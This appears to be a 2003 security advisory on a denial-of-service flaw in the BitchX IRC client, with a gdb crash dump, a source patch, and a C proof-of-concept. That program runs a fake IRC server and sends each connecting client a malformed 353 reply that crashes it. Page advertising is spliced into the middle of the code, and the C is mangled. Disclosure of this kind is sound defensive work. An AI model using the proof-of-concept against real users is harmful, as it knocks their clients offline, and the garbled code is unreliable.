[argv] BitchX-353 Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Mon Feb 17 15:26:06 EST 2003

1. Topic: BitchX IRC Client
2. Relevant versions: Vulnerable: BitchX-75p3 BitchX-1.0c16 BitchX-1.0c19 BitchX-1.0c20cvs Not Vulnerable: BitchX-1.0c18
3. Problem description: A denial of service vulnerability exists in BitchX. Sending a malformed RPL_NAMREPLY numeric 353 causes BitchX to segfault. This problem was reported to panasync@efnet#bitchx on Jan 30 2003, as of this writing we are unaware of any patches or workarounds provided by panasync and or any members of #bitchx
4. Workaround: Patch Included Use epic, ircII
5. References: http://www.bitchx.org http://www.epicsol.org http://www.ircii.org
6. Contact: argv@hushmail.com
   • -----begin gdb.output----- argv@black:~/BitchX_353/BitchX/source$ gdb ./BitchX Reading symbols from ./BitchX...done. (gdb) r argv.matrux.net Starting program: /home/argv/BitchX_353/BitchX/source/./BitchX argv.matrux.net BitchX - Based on EPIC Software Labs epic ircII (1998). Version (BitchX-1.0c20cvs) -- Date (20020325). Process [30890] Program received signal SIGSEGV, Segmentation fault. 0x80bcdff in funny_namreply () (gdb) info reg eax 0x0 0 ecx 0xbfffcf34 -1073754316 edx 0x0 0 ebx 0xbfffcf2c -1073754324 esp 0xbfffcc94 0xbfffcc94 ebp 0xbfffd7b5 0xbfffd7b5 esi 0xbfffd7b8 -1073752136 edi 0x0 0 eip 0x80bcdff 0x80bcdff eflags 0x10282 66178 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 fctrl 0x37f 895 fstat 0x20 32 ftag 0xffff 65535 fiseg 0x23 35 fioff 0x80d1c7c 135076988 foseg 0x2b 43 fooff 0xbfffe130 -1073749712 fop 0x0 0 (gdb) disass $eip-0x20 $eip+0x20Dump of assembler code from 0x80bcddf to 0x80bce1f: 0x80bcddf <funny_namreply+19>: sbb $0x0,%al 0x80bcde1 <funny_namreply+21>: add %al,(%eax) 0x80bcde3 <funny_namreply+23>: add %al,0x26af8c4(%ebx) 0x80bcde9 <funny_namreply+29>: push %ebx 0x80bcdea <funny_namreply+30>: mov 0x318(%eax),%eax 0x80bcdf0 <funny_namreply+36>: call *%eax 0x80bcdf2 <funny_namreply+38>: mov (%ebx),%ebp 0x80bcdf4 <funny_namreply+40>: mov 0x4(%ebx),%esi 0x80bcdf7 <funny_namreply+43>: mov 0x8(%ebx),%edi 0x80bcdfa <funny_namreply+46>: mov %edi,%edx 0x80bcdfc <funny_namreply+48>: add $0x10,%esp 0x80bcdff <funny_namreply+51>: cmpb $0x0,(%edi) 0x80bce02 <funny_namreply+54>: je 0x80bce2f <funny_namreply+99> 0x80bce04 <funny_namreply+56>: mov 0x1c(%esp,1),%ecx 0x80bce08 <funny_namreply+60>: inc %ecx 0x80bce09 <funny_namreply+61>: cmpb $0x20,(%edx) 0x80bce0c <funny_namreply+64>: je 0x80bce1b <funny_namreply+79> 0x80bce0e <funny_namreply+66>: mov %esi,%esi 0x80bce10 <funny_namreply+68>: inc %edx 0x80bce11 <funny_namreply+69>: mov (%edx),%al 0x80bce13 <funny_namreply+71>: test %al,%al 0x80bce15 <funny_namreply+73>: je 0x80bce1b <funny_namreply+79> 0x80bce17 <funny_namreply+75>: cmp $0x20,%al 0x80bce19 <funny_namreply+77>: jne 0x80bce10 <funny_namreply+68> 0x80bce1b <funny_namreply+79>: mov %ecx,0x1c(%esp,1) End of assembler dump.
   • -----end gdb.output-----
   • -----begin BitchX-1.0c20cvs-353.diff----- diff -Nru BitchX.orig/source/funny.c BitchX/source/funny.c
   • --- BitchX.orig/source/funny.c Sun Feb 16 18:34:16 2003 +++ BitchX/source/funny.c Sun Feb 16 18:39:56 2003 @@ -260,7 +260,10 @@ type = Args[0]; channel = Args[1]; line = Args[2];
   • - + if (channel == NULL || line == NULL) { + bitchsay("Invalid number of arguments for %s", __FUNCTION__); + return; + } ptr = line; while (*ptr) {
   • -----end BitchX-1.0c20cvs-353.diff-----
   • -----begin bitchx-353.c----- /*
     • bitchx-353.c
     • --argv
     • Jan/30/03 *
     • Vulnerable:
     • BitchX-75p3
     • BitchX-1.0c16
     • BitchX-1.0c19
     • BitchX-1.0c20cvs *
     • Not Vulnerable:
     • BitchX-1.0c18 (So far..) * *
     • Workaround:
     • in function funny_namreply()
     • after the PasteArgs(Args, 2);
     • add in
     • -- snip --
     • if (Args[1] == NULL || Args[2] == NULL)
     • return;
     • -- unsnip -- *
     • ---- the vuln code of bx -----
     • PasteArgs(Args, 2);
     • type = Args[0];
     • channel = Args[1];
     • line = Args[2]; *
     • ptr = line;
     • while (*ptr)
     • {
     • while (*ptr && (*ptr != ' '))
     • ptr++;
     • user_count++;
     • while (*ptr && (*ptr == ' '))
     • ptr++;
     • }
     • ------------------------------ *
     • [panasync(panasync@colossus.melnibone.org)] you would hope the irc server would be a trusted source.
     • [hellman(hellman@ipv6.gi-1.au.reroute.se)] 'Free porn at /server irc.owned.com' * */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

static char shellcode[] = ":* 353 * = :\n"; // <-- this could be something worse.

int acceptConnection(int fd)
{

   char *ip_addr;
   int descriptor, sal;
   struct sockaddr_in sa;
   sal = sizeof(sa);
   descriptor = accept(fd, (struct sockaddr *) &sa, &sal);    if (descriptor >= 0) {

      ip_addr = inet_ntoa(sa.sin_addr);
      printf("Connection from %s:%d\n", ip_addr, ntohs(sa.sin_port));

int main(int argc, char **argv)
{

   int sock, serv, port;
   struct sockaddr_in server;

   port = 6667;

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

   if (argc > 1)

        port = atoi(argv[1]);

   memset(&server, 0, sizeof(server));

   server.sin_port = htons(port);
   server.sin_family = AF_INET;
   server.sin_addr.s_addr = INADDR_ANY;

   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);    setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &serv, sizeof(int));

   if (bind(sock, (struct sockaddr *) &server, sizeof(struct sockaddr_in))

• -1) { return 0; }

   listen(sock, 1);

   while (1) {

      serv = acceptConnection(sock);
      write(serv, shellcode, strlen(shellcode));
      close(serv);

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

wlkEARECABkFAj5QbkISHGFyZ3ZAaHVzaG1haWwuY29tAAoJEO/BXrpp9BkpePMAn3ow kud38PTuH44w5ORSZRTDkX5sAJ9xM08bueYHZXkPiRpLuyZbKGy/8A== =Vm4W
-----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 Received on Tue Feb 18 13:21:27 2003